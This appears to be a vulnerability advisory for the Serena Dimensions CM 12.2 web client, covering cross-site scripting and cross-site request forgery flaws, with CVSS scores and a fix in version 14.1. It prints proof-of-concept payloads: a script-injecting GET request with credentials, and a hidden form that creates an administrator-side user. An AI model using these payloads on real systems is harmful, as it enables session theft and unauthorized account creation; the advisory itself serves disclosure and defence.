6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.003 Low
EPSS
Percentile
69.0%
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) - CVE-2014-0335
#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter] /dimensions/ [DB_NAME parameter] /dimensions/ [DM_HOST parameter] /dimensions/ [MAN_DB_NAME parameter]
#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter] /dimensions/ [identifier parameter] /dimensions/ [identifier parameter] /dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter] /dimensions/ [nav_frame parameter] /dimensions/ [nav_jsp parameter] /dimensions/ [target_frame parameter] /dimensions/ [id parameter] /dimensions/ [type parameter]
Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1
CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336
Proof-of-Concept:
`<html>
<body>
<form
action=“[http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects](<http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects>)
.
User&create=yes” method=“POST”>
<input type=“hidden” name=“-AdmAttrNames.user_dept” value= />
<input type=“hidden” name=“-AdmAttrNames.id” value=“HACKTEST1” />
<input type=“hidden” name=“USER_CURWORKSET” value=“%24GENERIC%3a%24GLOBAL” />
<input type=“hidden” name=“isUserEdit” value=“false” />
<input type=“hidden” name=“-AdmAttrNames.user_site” value= />
<input type=“hidden” name=“-AdmAttrNames.user_phone” value= />
<input type=“hidden” name=“AUTOMATIC_LOGIN” value= />
<input type=“hidden” name=“-AdmAttrNames.user_group_id” value= />
<input type=“hidden” name=“null” value= />
<input type=“hidden” name=“DIALOG_MODE” value=“MODE%5fCREATE” />
<input type=“hidden” name=“-AdmAttrNames.user_full_name” value=“HACKTEST1” />
<input type=“hidden” name=“projectPicker” value=“%24GENERIC%3a%24GLOBAL” />
<input type=“hidden” name=“wait_until_loaded” value= />
<input type=“hidden” name=“projectPickerUid” value=“1” />
<input type=“hidden” name=“GROUPS_ASSIGNED” value= />
<input type=“hidden” name=“-AdmAttrNames.email”
value=“ken1%2ecijsouw%40sincerus%2enl” />
<input type=“submit” value=“Submit request” />
</form>
</body>`
A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session.
Apply an update
The vendor has addressed these issues in version 14.1. Users are encouraged to update to the latest release.
Restrict access
As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user’s host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.
823452
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Expand all
Javascript is disabled. Click here to view vendors.
Updated: September 17, 2015
Statement Date: September 17, 2015
Affected
We have not received a statement from the vendor.
VU#823452 has been addressed by the Dimensions CM version 14.1 and later, which was released in June 2014.
Group | Score | Vector |
---|---|---|
Base | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P |
Temporal | 5.5 | E:POC/RL:U/RC:UC |
Environmental | 1.4 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND |
Thanks to Ken Cijsouw for reporting this vulnerability.
This document was written by Michael Orlando.
CVE IDs: | CVE-2014-0335, CVE-2014-0336 |
---|---|
Date Public: | 2014-03-07 Date First Published: |